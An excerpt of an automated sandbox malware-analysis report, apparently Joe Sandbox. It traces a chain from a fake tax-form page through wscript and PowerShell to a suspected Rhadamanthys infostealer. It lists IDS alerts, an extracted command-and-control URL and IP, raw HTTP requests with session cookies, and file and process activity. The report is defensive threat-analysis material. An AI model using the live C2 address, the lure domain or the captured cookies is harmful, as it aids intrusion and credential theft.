Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000011.00000002.2532186545.0000023AD044E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdb source: fontdrvhost.exe, 00000021.00000003.1787769228.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000021.00000003.1788934182.0000000004E01000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: fontdrvhost.exe, 00000021.00000003.1790129763.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000021.00000003.1794426935.0000000004EF0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: fontdrvhost.exe, fontdrvhost.exe, 00000021.00000003.1779873993.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000021.00000003.1776780757.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: fontdrvhost.exe, 00000021.00000003.1784698431.0000000004E70000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000021.00000003.1782580310.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: fontdrvhost.exe, 00000021.00000003.1779873993.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000021.00000003.1776780757.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: fontdrvhost.exe, 00000021.00000003.1784698431.0000000004E70000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000021.00000003.1782580310.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbUGP source: fontdrvhost.exe, 00000021.00000003.1787769228.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000021.00000003.1788934182.0000000004E01000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: fontdrvhost.exe, 00000021.00000003.1790129763.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000021.00000003.1794426935.0000000004EF0000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 19_2_058878D9 GetLogicalDriveStringsW,QueryDosDeviceW,lstrlenW,_wcsnicmp,_snwprintf,lstrcpyW,

19_2_058878D9

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_de2cba4fb6d07d9ffa5fcfac6871b6b3655c61d4_00000000_46df13dc-81ea-4a25-b367-c2dbbfe6f84f\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_9bb339a58ff9b4412d9b734fd588f7f44673659_00000000_85e6ddd5-e3ce-4017-bbdc-80a37d168c06\

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Child: C:\Windows\System32\wscript.exe
Source: C:\Windows\System32\wscript.exe	Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Windows\System32\fontdrvhost.exe

Code function: 4x nop then dec esp

37_2_0000025AD4150511

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:2484 -> 192.168.2.16:49771
Source: Network traffic	Suricata IDS: 2047905 - Severity 1 - ET MALWARE Observed Malicious Powershell Loader Payload Request (GET) : 192.168.2.16:49761 -> 142.250.185.225:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://185.208.159.170:2484/38d2415e410113/9do988c8.3o15p

Source: global traffic

TCP traffic: 192.168.2.16:49771 -> 185.208.159.170:2484

Source: Joe Sandbox View	IP Address: 151.101.129.229 151.101.129.229
Source: Joe Sandbox View	IP Address: 23.209.213.129 23.209.213.129

Source: Joe Sandbox View

ASN Name: SIMPLECARRER2IT SIMPLECARRER2IT

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2823606 - Severity 1 - ETPRO EXPLOIT_KIT Possible Evil Redirect Leading to EK Dec 04 2016 : 45.223.19.158:443 -> 192.168.2.16:49743
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.16:49762 -> 185.166.143.48:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.16:49761 -> 142.250.185.225:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.16:49761 -> 142.250.185.225:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.16:49760 -> 142.250.185.225:443

Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.185.163
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.185.163
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.159.170

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: tax1099.netlify.appConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /npm/javascript-obfuscator/dist/index.browser.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://tax1099.netlify.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/jszip/3.10.1/jszip.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://tax1099.netlify.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/favicon.png HTTP/1.1Host: www.tax1099.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://tax1099.netlify.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/favicon.png HTTP/1.1Host: www.tax1099.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=ksJtVbPJ_DbXfjq23ajNgWzB9tYOf8uOP6QSltbbMhE-1742233965-1.0.1.1-rc5BkaqL0npujM0BhOqaxHeaXv2frZvHVOWJsV_GQwC.K2CQNnsBRIkVeHuin.IZDzHkGm8C94J.b7Z9ETVlp.Bey.GdqjcL_UY6X4y4mc8
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.securefilepro.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://tax1099.netlify.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /portal/styles.cc0a641a0c9da1ad.css HTTP/1.1Host: www.securefilepro.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=LoIFFSdIT5S/53Ovnn7IKHJh2GcAAAAAQUIPAAAAAADi2HItZRN1rc6ELxf4wQt7; nlbi_3142003=cOzzUSmEMm3Uey77F8X9dQAAAADzLXg/yYp9grmAKCJER9Jn; incap_ses_1845_3142003=8UhObfxLyDq+Rr4BCcKaGXJh2GcAAAAASwzlWxvJXgODZU9S5bdSgg==
Source: global traffic	HTTP traffic detected: GET /npm/alertifyjs@1.13.1/build/css/alertify.min.css HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveOrigin: https://www.securefilepro.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /npm/alertifyjs@1.13.1/build/alertify.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /portal/runtime.5be9c3325b3311c4.js HTTP/1.1Host: www.securefilepro.comConnection: keep-aliveOrigin: https://www.securefilepro.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=LoIFFSdIT5S/53Ovnn7IKHJh2GcAAAAAQUIPAAAAAADi2HItZRN1rc6ELxf4wQt7; nlbi_3142003=cOzzUSmEMm3Uey77F8X9dQAAAADzLXg/yYp9grmAKCJER9Jn; incap_ses_1845_3142003=8UhObfxLyDq+Rr4BCcKaGXJh2GcAAAAASwzlWxvJXgODZU9S5bdSgg==
Source: global traffic	HTTP traffic detected: GET /portal/polyfills.4aee66a14cad3606.js HTTP/1.1Host: www.securefilepro.comConnection: keep-aliveOrigin: https://www.securefilepro.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=LoIFFSdIT5S/53Ovnn7IKHJh2GcAAAAAQUIPAAAAAADi2HItZRN1rc6ELxf4wQt7; nlbi_3142003=cOzzUSmEMm3Uey77F8X9dQAAAADzLXg/yYp9grmAKCJER9Jn; incap_ses_1845_3142003=8UhObfxLyDq+Rr4BCcKaGXJh2GcAAAAASwzlWxvJXgODZU9S5bdSgg==
Source: global traffic	HTTP traffic detected: GET /portal/main.690005fd134686e7.js HTTP/1.1Host: www.securefilepro.comConnection: keep-aliveOrigin: https://www.securefilepro.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=LoIFFSdIT5S/53Ovnn7IKHJh2GcAAAAAQUIPAAAAAADi2HItZRN1rc6ELxf4wQt7; nlbi_3142003=cOzzUSmEMm3Uey77F8X9dQAAAADzLXg/yYp9grmAKCJER9Jn; incap_ses_1845_3142003=8UhObfxLyDq+Rr4BCcKaGXJh2GcAAAAASwzlWxvJXgODZU9S5bdSgg==
Source: global traffic	HTTP traffic detected: GET /_Incapsula_Resource?SWJIYLWA=719d34d31c8e3a6e6fffd425f7e032f3&ns=1&cb=661820476 HTTP/1.1Host: www.securefilepro.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=LoIFFSdIT5S/53Ovnn7IKHJh2GcAAAAAQUIPAAAAAADi2HItZRN1rc6ELxf4wQt7; nlbi_3142003=cOzzUSmEMm3Uey77F8X9dQAAAADzLXg/yYp9grmAKCJER9Jn; incap_ses_1845_3142003=8UhObfxLyDq+Rr4BCcKaGXJh2GcAAAAASwzlWxvJXgODZU9S5bdSgg==
Source: global traffic	HTTP traffic detected: GET /_Incapsula_Resource?SWKMTFSR=1&e=0.9864439118759336 HTTP/1.1Host: www.securefilepro.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=LoIFFSdIT5S/53Ovnn7IKHJh2GcAAAAAQUIPAAAAAADi2HItZRN1rc6ELxf4wQt7; nlbi_3142003=cOzzUSmEMm3Uey77F8X9dQAAAADzLXg/yYp9grmAKCJER9Jn; incap_ses_1845_3142003=8UhObfxLyDq+Rr4BCcKaGXJh2GcAAAAASwzlWxvJXgODZU9S5bdSgg==; ___utmvc=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
Source: global traffic	HTTP traffic detected: GET /assets/sfp.html HTTP/1.1Host: www.securefilepro.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=LoIFFSdIT5S/53Ovnn7IKHJh2GcAAAAAQUIPAAAAAADi2HItZRN1rc6ELxf4wQt7; nlbi_3142003=cOzzUSmEMm3Uey77F8X9dQAAAADzLXg/yYp9grmAKCJER9Jn; incap_ses_1845_3142003=8UhObfxLyDq+Rr4BCcKaGXJh2GcAAAAASwzlWxvJXgODZU9S5bdSgg==; ___utmvc=HG2ROMKShxbdGEcCq9AA1G9zDIrV5qFfK+Ds9c66i5v3CsjiJSXEi/8NFP43GFH9wTvXbPxMQbp191NyL5nLxvnR0EOvwLB+rYFiEw2zYwtKZ9MRy3nQQxIHAjxhvFAYm0o0l378N1K9ec5gogddJrd66Tte/gyhYdAm12v2KdAIOTI7hN3uBSTNZuflnoOKTtq49Yleie1ns1ZS9lFT9eQm4Q3eFwkvXvNxqJCKuc6kp6LVfC65LG95thhPnhsybKsp4WiGRT33TFA2NRo8ZxtIbkoI9oxPnSCEzWGEVqQP2AfnlBErRwQ+BfmfG7xOdLQ8d8qtiORlRUjLrcMB4UIj5A4p2Tfs4NdE7fj/HdKte8S3u1E7tt3NoszSIr5YrP+O/ZR/muheewfAkDp1SqqA8HE7saLzt2JtmBUzjXQQHsbydRUy5wXiPkvnlian6IcIWpUFBZ8/x30u8TDaZd857aSxGTLTBwwz9j7KetrNVKSf2Fzi9/KHSfk0xiHsI/4nbJkCBOGm7hnnFMX3LfKLATepz9EJWsEtxplSTvuVc1Z5K3AQaT1Oqba9Md3gWUrjo93WguZmEh8CyTPY+uzrUKCXiNO9VIW+ZwUu74G6U7MQUfYWk+BpLS9aNRHCezBEM4EIc/tEcKwPfc+dCwRWNISIDwID0nmHkqSR0snO864L1D+oPr87pWdrBpF/MYtbl1yb1+uwwWy+LSTZtrFDjSSoQa51DZT9Bo+p4CV+QBDZrsn4yy1BrpCSUEfeDW0jx4X1I5mmMumkpqWb0ZrOEFwfNfXvMULWLgQ60OtciUL6RH5BmTEtj+HyrbJKaGBJfafsH07MIGy3hEWROoZoY2DjBOZVwa4y2PoxdUrHAvyitrfQKygQ0M4yI2zLqypVdIskyTSoWjiEuSf9/JSb/CEfBVR4HpRprRsfzGHv/+5cgzaUt0PSfoUAIpmXKPepzat/+r/AvE/1o1f9kWac5V0ISrpHqBPeEQiB5a5e+fY2+vKAZKg1xBAUeLXmTyvXSwZUifVFirgb+Zpzcseesb1l